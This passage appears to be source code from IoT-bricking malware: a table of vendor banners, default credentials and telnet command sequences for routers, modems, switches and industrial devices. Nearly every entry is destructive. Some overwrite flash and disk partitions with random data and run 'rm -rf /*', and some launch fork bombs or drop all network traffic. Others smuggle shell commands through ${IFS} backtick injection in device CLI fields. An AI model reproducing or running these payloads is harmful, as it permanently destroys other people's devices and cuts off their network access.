 'busybox cat /dev/urandom >/dev/mtd2 &' , '' ,
3080
 'busybox cat /dev/urandom >/dev/mtd3 &' , '' ,
3081
 'busybox cat /dev/urandom >/dev/mtd4 &' , '' ,
3082
 'busybox cat /dev/urandom >/dev/mtd5 &' , '' ,
3083
 'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3084
 'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3085
 'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3086
 'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3087
 'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3088
 'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3089
 'route del default;rm -rf /* 2>/dev/null &' , "%WAIT%" ,
3090
 "poweroff -n -f" , '%TERM%' ,
3091
 ] ,
3092
[ "zte" , "root/Zte521" , '' ,
3093
 'flash_eraseall /dev/mtd0 >/dev/null &' , '' ,
3094
 'flash_eraseall /dev/mtd1 >/dev/null &' , '' ,
3095
 'flash_eraseall /dev/mtd2 >/dev/null &' , '' ,
3096
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
3097
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
3098
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
3099
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
3100
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3101
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3102
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3103
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3104
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3105
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3106
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
3107
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
3108
 'iptables -F;iptables -t nat -F' , '' ,
3109
 'ip route del default' , '' ,
3110
 'ip route' , '[#$] ' ,
3111
 'ip link set ppp0 down' , '' ,
3112
 'ip link set br0 down' , '' ,
3113
 'ip link set eth0 down' , '' ,
3114
 'iptables -A fwinput -J DROP;iptables -A OUTPUT -j DROP;rm -rf /* &' , '%WAIT%' ,
3115
 ] ,
3116
[ "zyxel" , ".*" , 'Linux\sZyXEL\s2.*mips.*BusyBox' ,
3117
 "iptables -F" , '' ,
3118
 "iptables -t nat -F" , '' ,
3119
 "route del default" , '' ,
3120
 'sysctl -w kernel.threads-max=1' , '' ,
3121
 "iptables -A OUTPUT -j DROP" , '%WAIT%' ,
3122
 ] ,
3123
[ "hisilicon" , "root/jvbzd" , 'w:\snot\sfound' ,
3124
 "fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
3125
 "w" , '[#$] ' ,
3126
 "fdisk /dev/sda" , 'm\sfor\shelp\S?: ' ,
3127
 "w" , '[#$] ' ,
3128
 "iproute del default" , '[#$] ' ,
3129
 "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
3130
 "sysctl -w kernel.threads-max=1" , '%WAIT% ' ,
3131
 "halt -n -f" , '[#$] ' ,
3132
 "reboot" , '[#$] ' ,
3133
 ] ,
3134
[ "juantech" , "root/juantech" , 'w:\snot\sfound' ,
3135
 'cat /dev/urandom >/dev/sda &' , '' ,
3136
 'cat /dev/urandom >/dev/sda1 &' , '' ,
3137
 'cat /dev/urandom >/dev/sda2 &' , '' ,
3138
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
3139
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
3140
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
3141
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
3142
 'cat /dev/urandom >/dev/mtd4 &' , '' ,
3143
 'cat /dev/urandom >/dev/mtd5 &' , '' ,
3144
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3145
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3146
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3147
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3148
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3149
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3150
 "route del default" , '[#$] ' ,
3151
 "fdisk /dev/sda2" , 'm\sfor\shelp\S?: ' ,
3152
 "w" , '[#$] ' ,
3153
 "fdisk /dev/sda1" , 'm\sfor\shelp\S?: ' ,
3154
 "w" , '[#$] ' ,
3155
 "fdisk /dev/sda" , 'm\sfor\shelp\S?: ' ,
3156
 "w" , '[#$] ' ,
3157
 "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
3158
 "sysctl -w kernel.threads-max=1" , '%WAIT% ' ,
3159
 "halt -n -f" , '[#$] ' ,
3160
 "reboot" , '[#$] ' ,
3161
 ] ,
3162
[ 'celltrash' , '.*' , '5 : Load Default and Reboot Router' ,
3163
 '2' , '#' ,
3164
 '3' , 'mode:' ,
3165
 '4' , 'no\S:' ,
3166
 '2' , '#' ,
3167
 '0' , '#' ,
3168
 '4' , '#' ,
3169
 ] ,
3170
[ "dlink" , ".*" , 'upgrade.*dlink\.ru.*firm.*' ,
3171
 "set lan ip 10.1.2.3 255.255.255.0\nsave" , '' ,
3172
 "set upnp off\nsave" , '' ,
3173
 "set dhcp off\nsave" , '' ,
3174
 "set dmz off\nsave" , '' ,
3175
 "set wifi off\nsave" , '' ,
3176
 "sh" , '[#$] ' ,
3177
'cat /dev/urandom >/dev/sda &' , '' ,
3178
 'cat /dev/urandom >/dev/sda1 &' , '' ,
3179
 'cat /dev/urandom >/dev/sda2 &' , '' ,
3180
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
3181
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
3182
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
3183
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
3184
 'cat /dev/urandom >/dev/mtd4 &' , '' ,
3185
 'cat /dev/urandom >/dev/mtd5 &' , '' ,
3186
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3187
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3188
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3189
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3190
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3191
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3192
 "iptables -F" , '' ,
3193
 "iptables -t nat -F" , '' ,
3194
 'route del default;rm -rf /* 2>/dev/null &' , '[#$] ' ,
3195
 "iptables -A OUTPUT -j DROP" , '%TERM%' ,
3196
 ] ,
3197
 [ "dlink" , ".*" , 'You have a full access' ,
3198
 "set lan ip 10.1.2.3 255.255.255.0\nsave" , '' ,
3199
 "set upnp off\nsave" , '' ,
3200
 "set dhcp off\nsave" , '' ,
3201
 "set dmz off\nsave" , '' ,
3202
 "set wifi off\nsave" , '' ,
3203
 "sh" , '[#$] ' ,
3204
 'cat /dev/urandom >/dev/sda &' , '' ,
3205
 'cat /dev/urandom >/dev/sda1 &' , '' ,
3206
 'cat /dev/urandom >/dev/sda2 &' , '' ,
3207
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
3208
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
3209
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
3210
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
3211
 'cat /dev/urandom >/dev/mtd4 &' , '' ,
3212
 'cat /dev/urandom >/dev/mtd5 &' , '' ,
3213
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3214
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3215
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3216
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3217
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3218
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3219
 "iptables -F" , '' ,
3220
 "iptables -t nat -F" , '' ,
3221
 'route del default;rm -rf /* 2>/dev/null &' , '[#$] ' ,
3222
 "iptables -A OUTPUT -j DROP" , '%TERM%' ,
3223
 ] ,
3224
[ "mdm" , ".*" , 'mdm\d\d+\S*\$' ,
3225
 "passwd" , "Old password:" ,
3226
 '%OLDPASS%' , 'Enter new password: ' ,
3227
 '%NEWPASS%' , 'Re-enter new password: ' ,
3228
 '%NEWPASS%' , '[#$] ' ,
3229
 'su root' , 'Password: ' ,
3230
 'oelinux123' , '[#$] ' ,
3231
 'passwd' , 'New password: ' ,
3232
 '%NEWPASS%' , 'Retype password: ' ,
3233
 '%NEWPASS%' , '[#$] ' ,
3234
'ps aux | grep -v "ps aux" | grep -v "grep" | grep -v "random" | grep -v "awk" | grep -v "xargs" | /bin/awk \'{print $1}\' | xargs kill -9' , '%TERM%' ,
3235
 ] ,
3236
 [ "mdm" , ".*" , 'mdm\d\d+' ,
3237
 'passwd' , 'New password: ' ,
3238
 '%NEWPASS%' , 'Retype password: ' ,
3239
 '%NEWPASS%' , '[#$] ' ,
3240
 'reboot' , '%WAIT%' ,
3241
 'ps aux | grep -v "ps aux" | grep -v "grep" | grep -v "random" | grep -v "awk" | grep -v "xargs" | /bin/awk \'{print $1}\' | xargs kill -9' , '%TERM%' ,
3242
 ] ,
3243
[ "eltex" , ".*" , 'M5J9DWFfcVbL.*AuwJc4KI.*bin/ash' ,
3244
 "telnet localhost" , 'login: ' ,
3245
 "root" , 'Password: ' ,
3246
 'adminpassword' , 'root\S+# ' ,
3247
 'passwd %OLDUSER%' , 'New password:' ,
3248
 '%NEWPASS%' , 'Retype password:' ,
3249
 '%NEWPASS%' , 'root\S+# ' ,
3250
 'passwd' , 'New password:' ,
3251
 '%NEWPASS%' , 'Retype password:' ,
3252
 '%NEWPASS%' , 'root\S+# ' ,
3253
 'save' , 'root\S+# ' ,
3254
 'reboot' , 'root\S+# ' ,
3255
 ] ,
3256
[ 'qcpe' , 'admin/.*' , 'CPE> .*please enter \? for help\.' ,
3257
 'enable' , '[#>] ' ,
3258
 'router' , '[#>] ' ,
3259
 'wan name x y' , '[#>] ' ,
3260
 'wan commit' , '[#>] ' ,
3261
 "wan ip isp , user 1.2.3.4 255.255.255.0 1.2.3.5\nwan commit" , '[#>] ' ,
3262
 "lan ip 2.3.4.5 255.255.255.254\nlan commit" , '[#>] ' ,
3263
 'wlan disable' , '[#>] ' ,
3264
 '..' , '[#>] ' ,
3265
 'wimax' , '[#>] ' ,
3266
 'wmx auth username a b' , '[#>] ' ,
3267
 'wmx autoconnect disable' , '[#>] ' ,
3268
 'wmx commit' , '[#>] ' ,
3269
 "wmx disconnect\nwmx commit" , '[#>] ' ,
3270
 '..' , '[#>] ' ,
3271
 'router' , '[#>] ' ,
3272
 "filter add 0.0.0.0/0 1:65535 0.0.0.0/0 1:65535 tcp\nfilter commit" , '[#>] ' ,
3273
 ] ,
3274
[ 'vigor' , '.*' , 'Watch Dog Closed' ,
3275
 'enable' , '[>#] ' ,
3276
 'configure system' , '[>#] ' ,
3277
 'config local backup ;sh' , '[>#] ' ,
3278
 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' ,
3279
 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' ,
3280
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' ,
3281
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' ,
3282
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' ,
3283
 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' ,
3284
 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' ,
3285
 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' ,
3286
 'route del default' , '%WAIT%' ,
3287
 'reboot' , '[>#] ' ,
3288
 ] ,
3289
[ 'phyhome' , '.*' , 'Index.*User.*Priority.*Location' ,
3290
 'configure' , '[>#] ' ,
3291
 'set hostname HACKED' , '[>#] ' ,
3292
 'erase startup-config' , '\]' ,
3293
 'y' , '[>#] ' ,
3294
 'reboot' , '\]' ,
3295
 'y' , '[>#] ' ,
3296
 ] ,
3297
[ 'edatahome' , '.*' , '% Unknown command:w\.' ,
3298
 'enable' , '[>#] ' ,
3299
 'erase startup-config' , '[>#] ' ,
3300
 'urlexport 1.2.3.4 test test `cat${IFS}/dev/urandom${IFS}>/dev/root` white' , '%WAIT%' ,
3301
 'date 2030 12 31 23 59 59' , '%WAIT%' ,
3302
 'exit' , '' ,
3303
 ] ,
3304
[ 'oapsmc' , '.*' , 'Unrecognized command or Incomplete command\.' ,
3305
 'reset configuration' , '[>#] ' ,
3306
 'reset configuration' , '[>#] ' ,
3307
 'reset configuration' , '[>#] ' ,
3308
 ] ,
3309
[ 'egcpa' , '.*' , 'Unknown command \'uname\'' ,
3310
 'logfile-upload' , 'URL: ' ,
3311
 'ftp://127.0.0.1/&&`dd${IFS}if=/dev/zero${IFS}of=/dev/mtdblock5${IFS}&`' , '[>#] ' ,
3312
 'logfile-upload' , 'URL: ' ,
3313
 'ftp://127.0.0.1/&&`dd${IFS}if=/dev/zero${IFS}of=/dev/root`' , '[>#] ' ,
3314
 'uci commit' , '[>#] ' ,
3315
 ] ,
3316
[ 'bintec' , '.*' , 'wizInternetGtw' ,
3317
 'ifconfig' , '[>#] ' ,
3318
 'ifconfig 1000000 down' , '[>#] ' ,
3319
 'ifconfig 1010000 down' , '[>#] ' ,
3320
 'ifconfig 1020000 down' , '[>#] ' ,
3321
 'ifconfig 1030000 down' , '[>#] ' ,
3322
 'ifconfig 1040000 down' , '[>#] ' ,
3323
 'ifconfig 50000 down' , '[>#] ' ,
3324
 'ifconfig 50001 down' , '[>#] ' ,
3325
 'ifconfig 100001 down' , '[>#] ' ,
3326
 'ifconfig 10001 down' , '[>#] ' ,
3327
 'ifconfig 1001 down' , '[>#] ' ,
3328
 'ifconfig 1000 down' , '[>#] ' ,
3329
 'halt' , '[>#] ' ,
3330
 ] ,
3331
[ 'texasi' , 'root/.*' , '% Invalid input at caret\.' ,
3332
 "exit" , '[>#] ' ,
3333
 'enable' , ': ' ,
3334
 '%OLDPASS%' , '[>#] ' ,
3335
 'shell' , '[>#] ' ,
3336
'cat /dev/urandom >/dev/mtdblock/0 &' , '[>#] ' ,
3337
 'cat /dev/urandom >/dev/mtdblock/1 &' , '[>#] ' ,
3338
 'cat /dev/urandom >/dev/mtdblock/2 &' , '[>#] ' ,
3339
 'cat /dev/urandom >/dev/mtdblock/3 &' , '[>#] ' ,
3340
 'cat /dev/urandom >/dev/mtdblock/4 &' , '[>#] ' ,
3341
 'cat /dev/urandom >/dev/mtdblock/5 &' , '[>#] ' ,
3342
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
3343
 'd() { d|d & }; d 2>/dev/null' , '[>#] ' ,
3344
 'route del default' , '[>#] ' ,
3345
 ] ,
3346
[ 'kaco' , '.*' , 'Mode: (APPLICATION|BOOTROM)' ,
3347
 'ipconfig -s 1.2.3.4 255.255.255.0 1.2.3.5' , '[>#] ' ,
3348
 'format' , '[>#] ' ,
3349
'reset' , '[>#] ' ,
3350
 ] ,
3351
[ 'atdev' , '.*' , 'TELNET session now in ESTABLISHED state' ,
3352
 'clear flash' , '[>#] ' ,
3353
 'clear NVS' , '[>#] ' ,
3354
 'delete file=config.ins' , '[>#] ' ,
3355
 'delete file=config.gui' , '[>#] ' ,
3356
 'set user=%OLDUSER% login=no telnet=no' , '[>#] ' ,
3357
 'set ip nameserver=127.0.0.1' , '[>#] ' ,
3358
 'set ip secondarynameserver=127.0.0.1' , '[>#] ' ,
3359
 'set ip interface=ppp0 ipaddress=127.0.0.1' , '[>#] ' ,
3360
 'set ip interface=eth1 ipaddress=127.0.0.1' , '[>#] ' ,
3361
 'set ip interface=eth0 ipaddress=127.0.0.1' , '[>#] ' ,
3362
 'set ip interface=vlan1 ipaddress=127.0.0.1' , '[>#] ' ,
3363
 'set ip interface=port1 ipaddress=127.0.0.1' , '[>#] ' ,
3364
 'set ip interface=port2 ipaddress=127.0.0.1' , '[>#] ' ,
3365
 'set ip interface=port3 ipaddress=127.0.0.1' , '[>#] ' ,
3366
 'set ip interface=port4 ipaddress=127.0.0.1' , '[>#] ' ,
3367
 'set ip interface=port5 ipaddress=127.0.0.1' , '[>#] ' ,
3368
 ] ,
3369
[ 'adb' , '.*' , '\*\s+ADB BROADBAND\s+\*' ,
3370
 'restore default-setting' , '[>#] ' ,
3371
 'reboot' , '[>#] ' ,
3372
 ] ,
3373
[ 'weathergoose' , '.*' , 'ITW WeatherGoose' ,
3374
 'reset factory' , '[>#] ' ,
3375
 'reset network' , '[>#] ' ,
3376
 ] ,
3377
[ 'hpnp' , '.*' , 'clear configure create delete disable' ,
3378
 'unconfigure switch' , 'yes or no' ,
3379
 'yes' , 'configuration' ,
3380
 ] ,
3381
[ 'kopp' , '.*' , 'root\@kopp' ,
3382
 'cat /dev/urandom >/dev/mmcblk1p1 &' , '[>#] ' ,
3383
 'cat /dev/urandom >/dev/root &' , '[>#] ' ,
3384
 'route del default' , '[>#] ' ,
3385
 'rm -rf /* & 2>/dev/null' , '[>#] ' ,
3386
 ] ,
3387
[ 'elsist' , '.*' , 'Elsist.*maintenance shell' ,
3388
 'format Storage, 1' , 'Y,n' ,
3389
 'Y' , '[>#] ' ,
3390
 'format System, 1' , 'Y,n' ,
3391
 'Y' , '[>#] ' ,
3392
 'userconfig -p %OLDUSER% %NEWPASS%' , '[>#] ' ,
3393
 'cfgcommit' , '[>#] ' ,
3394
 'ifconfig -a eth0 1.2.3.4' , '[>#] ' ,
3395
 'ifconfig -g eth0 1.2.3.5' , '[>#] ' ,
3396
 'ifconfig -a eth1 1.2.3.6' , '[>#] ' ,
3397
 'ifconfig -g eth1 1.2.3.7' , '[>#] ' ,
3398
 'cfgcommit' , '[>#] ' ,
3399
 'sysconfig -wid' , '[>#] ' ,
3400
 'sysconfig -mtcpd' , '[>#] ' ,
3401
 'sysconfig -usbd' , '[>#] ' ,
3402
 'cfgcommit' , '[>#] ' ,
3403
 'reboot' , 'Y,n' ,
3404
 'Y' , 'rebooting' ,
3405
 ] ,
3406
[ 'swim' , '.*' , 'task wait: task \S+ not found\.' ,
3407
 'rm -r /tffs/*' , '[>#] ' ,
3408
 'reboot' , '[>#] ' ,
3409
 ] ,
3410
[ 'ciscobee' , '.*' , '(Embedded Telnet Server.*WARNING:.*authorized users only|COMMAND:\s+write_?memory|-s ElementSize1\.\.4)' ,
3411
 'cd /flash' , '[>#] ' ,
3412
 'init' , '[>#] ' ,
3413
'autoTest bootloader' , 'no\S ' ,
3414
 'yes' , '[>#] ' ,
3415
 'autoTest dyn' , 'no\S ' ,
3416
 'yes' , '[>#] ' ,
3417
 'autoTest perm' , 'no\S ' ,
3418
 'yes' , '[>#] ' ,
3419
'cd /' , '[>#] ' ,
3420
 'taskSuspend 0x81b597a8' , '[>#] ' ,
3421
 '0x819e0280' , '[>#] ' ,
3422
 'taskSuspend 0x819d13d0' , '[>#] ' ,
3423
 '0x81b597a8' , '[>#] ' ,
3424
 'taskSuspend 0x81b7aea0' , '[>#] ' ,
3425
 '1' , '[>#] ' ,
3426
 'cd /' , '[>#] ' ,
3427
 'taskSuspendAll' , '[>#] ' ,
3428
 'reset' , '[>#] ' ,
3429
 ] ,
3430
[ 'ubee' , '.*' , 'Error - what Unknown command:' ,
3431
 'cd /ubee' , '[>#] ' ,
3432
 'cabhCdpServerRouter' , '[>#] ' ,
3433
'cabhCdpServerRouter 127.0.0.1' , '[>#] ' ,
3434
'cd /' , '[>#] ' ,
3435
 'set password' , '\] ' ,
3436
 '%NEWPASS%' , '[>#] ' ,
3437
 'cd /wifi' , '[>#] ' ,
3438
 'nvram set wps_version2=disabled' , '[>#] ' ,
3439
 'nvram set wl0_ssid=HACKED' , '[>#] ' ,
3440
 'nvram set wps_device_name=HACKED' , '[>#] ' ,
3441
 'rc restart' , '[>#] ' ,
3442
 'cd /' , '[>#] ' ,
3443
] ,
3444
[ 'desdlink' , '.*' , 'DES-1210' ,
3445
 'reset config' , '[>#] ' ,
3446
 ] ,
3447
[ 'gpononu' , '.*' , 'ONU\(super\)#' ,
3448
 'shell' , '[>#] ' ,
3449
 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' ,
3450
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' ,
3451
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' ,
3452
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' ,
3453
 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' ,
3454
 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' ,
3455
 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' ,
3456
 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' ,
3457
 'cat /dev/urandom >/dev/root &' , '[>#] ' ,
3458
 'route del default' , '[>#] ' ,
3459
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' ,
3460
 'd(){ d|d & };d' , '%TERM%' ,
3461
 ] ,
3462
[ 'alcont' , '.*' , '(ONTUSER:|\/dev\/ubi1_1|\/ONTUSER|root\@AONT:)' ,
3463
 'df' , '[>#] ' ,
3464
 'dd if=/dev/urandom of=/dev/ubi1_1 &' , '[>#] ' ,
3465
 'dd if=/dev/urandom of=/dev/ubi5_0 &' , '[>#] ' ,
3466
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[>#] ' ,
3467
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[>#] ' ,
3468
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[>#] ' ,
3469
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[>#] ' ,
3470
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '[>#] ' ,
3471
 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '[>#] ' ,
3472
 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '[>#] ' ,
3473
 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[>#] ' ,
3474
 'dd if=/dev/urandom of=/dev/hda1 &' , '[>#] ' ,
3475
 'dd if=/dev/urandom of=/dev/hdb1 &' , '[>#] ' ,
3476
 'dd if=/dev/urandom of=/dev/mmcblk0 &' , '[>#] ' ,
3477
 'dd if=/dev/urandom of=/dev/mmcblk0p1 &' , '[#$>] ' ,
3478
 'cat /dev/urandom >/dev/ubi1_1 &' , '[>#] ' ,
3479
 'cat /dev/urandom >/dev/ubi5_0 &' , '[>#] ' ,
3480
 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' ,
3481
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' ,
3482
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' ,
3483
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' ,
3484
 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' ,
3485
 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' ,
3486
 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' ,
3487
 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' ,
3488
 'cat /dev/urandom >/dev/hda1 &' , '[>#] ' ,
3489
 'cat /dev/urandom >/dev/hdb1 &' , '[>#] ' ,
3490
 'cat /dev/urandom >/dev/mmcblk0 &' , '[>#] ' ,
3491
 'cat /dev/urandom >/dev/mmcblk0p1 &' , '[#$>] ' ,
3492
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[>#] ' ,
3493
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' ,
3494
 'd(){ d|d & };d' , '%TERM%' ,
3495
 ] ,
3496
[ 'busybroke' , '.*' , 'cat: /etc/passwd: No such file or directory' ,
3497
 'd() { d|d & }; d' , '' ,
3498
 'route del default' , '' ,
3499
 ] ,
3500
[ 'mtguest' , 'guest/guest' , 'MT7109' ,
3501
 'logout' , '%TERM%' ,
3502
 ] ,
3503
 [ 'mtguest' , 'user/user' , 'MT7109' ,
3504
 'logout' , '%TERM%' ,
3505
 ] ,
3506
 [ 'mtguest' , 'admin/.*' , 'MT7109' ,
3507
 'enable' , '[#>] ' ,
3508
 'router' , '[#>] ' ,
3509
 'wan name x y' , '[#>] ' ,
3510
 'wan commit' , '[#>] ' ,
3511
 "wan ip isp , user 1.2.3.4 255.255.255.0 1.2.3.5\nwan commit" , '[#>] ' ,
3512
 "lan ip 2.3.4.5 255.255.255.254\nlan commit" , '[#>] ' ,
3513
 'wlan disable' , '[#>] ' ,
3514
 '..' , '[#>] ' ,
3515
 'wimax' , '[#>] ' ,
3516
 'wmx auth username a b' , '[#>] ' ,
3517
 'wmx autoconnect disable' , '[#>] ' ,
3518
 "wmx disconnect\nwmx commit" , '[#>] ' ,
3519
 '..' , '[#>] ' ,
3520
 'router' , '[#>] ' ,
3521
 "filter add 0.0.0.0/0 1:65535 0.0.0.0/0 1:65535 tcp\nfilter commit" , '[#>] ' ,
3522
 '..' , '[#>] ' ,
3523
 'logout' , '%TERM%' ,
3524
 ] ,
3525
[ 'uclinux' , '.*' , '(uclinux\.org|sh: can\'t exec \'w\': No such file or directory|uClinux version)' ,
3526
 'cat /dev/urandom >/dev/mtdblock0 &' , '[#>] ' ,
3527
 'cat /dev/urandom >/dev/mtdblock1 &' , '[#>] ' ,
3528
 'cat /dev/urandom >/dev/mtdblock2 &' , '[#>] ' ,
3529
 'cat /dev/urandom >/dev/mtdblock3 &' , '[#>] ' ,
3530
 'cat /dev/urandom >/dev/mtdblock4 &' , '[#>] ' ,
3531
 'cat /dev/urandom >/dev/mtdblock5 &' , '[#>] ' ,
3532
 'cat /dev/urandom >/dev/mtdblock6 &' , '[#>] ' ,
3533
 'cat /dev/urandom >/dev/mtdblock7 &' , '[#>] ' ,
3534
 'cat /dev/urandom >/dev/mtdblock8 &' , '[#>] ' ,
3535
 'cat /dev/urandom >/dev/mtdblock9 &' , '[#>] ' ,
3536
 'route del default' , '[>#] ' ,
3537
 ] ,
3538
[ 'albof' , '.*' , '\*[AB]:\S+#\s' ,
3539
 'config' , '[>#] ' ,
3540
 'system' , '[>#] ' ,
3541
 'location `reboot`' , '[>#] ' ,
3542
 'name HACKED' , '[>#] ' ,
3543
 'exit all' , '[>#] ' ,
3544
 'file' , '[>#] ' ,
3545
 'shutdown' , '[>#] ' ,
3546
 'format' , 'y/n' ,
3547
 'y' , '[>#] ' ,
3548
 'exit all' , '[>#] ' ,
3549
 'admin' , '[>#] ' ,
3550
 'reboot auto-init' , 'y/n' ,
3551
 'y' , '[>#] ' ,
3552
 'reboot standby' , 'y/n' ,
3553
 'y' , '[>#] ' ,
3554
 'reboot active' , 'y/n' ,
3555
 'y' , '[>#] ' ,
3556
 ] ,
3557
[ 'genpoe' , '.*' , '\% Invalid input detected at \'\^\' marker\.' ,
3558
 'enable' , '[>#] ' ,
3559
 'write' , '[>#] ' ,
3560
 'erase boot-image first' , '[>#] ' ,
3561
 'erase boot-image second' , '[>#] ' ,
3562
 'erase config-file' , '[>#] ' ,
3563
 'reload' , 'y/n' ,
3564
 'y' , '[>#] ' ,
3565
 ] ,
3566
[ 'vigor27' , '.*' , '__\s+___\s+____\s_____\s__\s+___' ,
3567
 'exec ping `cat${IFS}/dev/zero${IFS}>/dev/root`' , '' ,
3568
 ] ,
3569
[ 'ciscovpn3000' , '.*' , '4\)\s+Save\s+changes\s+to\s+Config\s+file' ,
3570
 '2' , '[>#] ' ,
3571
 '8' , '[>#] ' ,
3572
 '9' , 'reformat' ,
3573
 'YES' , '[>#] ' ,
3574
 '10' , '[>#] ' ,
3575
 '3' , '[>#] ' ,
3576
 '3' , '[>#] ' ,
3577
 '2' , '[>#] ' ,
3578
 '2' , 'Done' ,
3579
 ] ,
3580
[ 'oxygen' , '.*' , 'system\s+System\soperations' ,
3581
 "\x03" , '' ,
3582
'system fdefaults' , 'y/n' ,
3583
 'y' , '[>#] ' ,
3584
 ] ,
3585
[ 'dsrdlink' , '.*' , '(D-Link DSR|util.*Utilities Mode)' ,
3586
 "\x03" , '' ,
3587
'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock0${IFS}&`' , '[>#] ' ,
3588
 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock1${IFS}&`' , '[>#] ' ,
3589
 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock2${IFS}&`' , '[>#] ' ,
3590
 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock3${IFS}&`' , '[>#] ' ,
3591
 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock4${IFS}&`' , '[>#] ' ,
3592
 'util md5sum `cat${IFS}/dev/urandom${IFS}>/dev/mtdblock5${IFS}&`' , '%WAIT%' ,
3593
 'util md5sum `poweroff`' , '[>#] ' ,
3594
 'util md5sum `reboot`' , '[>#] ' ,
3595
 ] ,
3596
[ '3comap' , '.*' , '(3Com Access Point|Access Point Rev \d|Type \"help\" for a list of valid commands\.)' ,
3597
 'set hostipaddr 127.0.0.1' , '[>#] ' ,
3598
 'set dhcpc disable' , '[>#] ' ,
3599
 'set ipaddr 127.0.0.1' , '[>#] ' ,
3600
 'applycfg' , 'Rebooting' ,
3601
 ] ,
3602
[ 'omniswitch' , '.*' , '(ERROR: Invalid entry: \"\/etc\/\"|Lucent OmniSwitch)' ,
3603
 'newfs /flash' , '= No' ,
3604
 'y' , '[>#] ' ,
3605
 'newfs /uflash' , '(= No|>)' ,
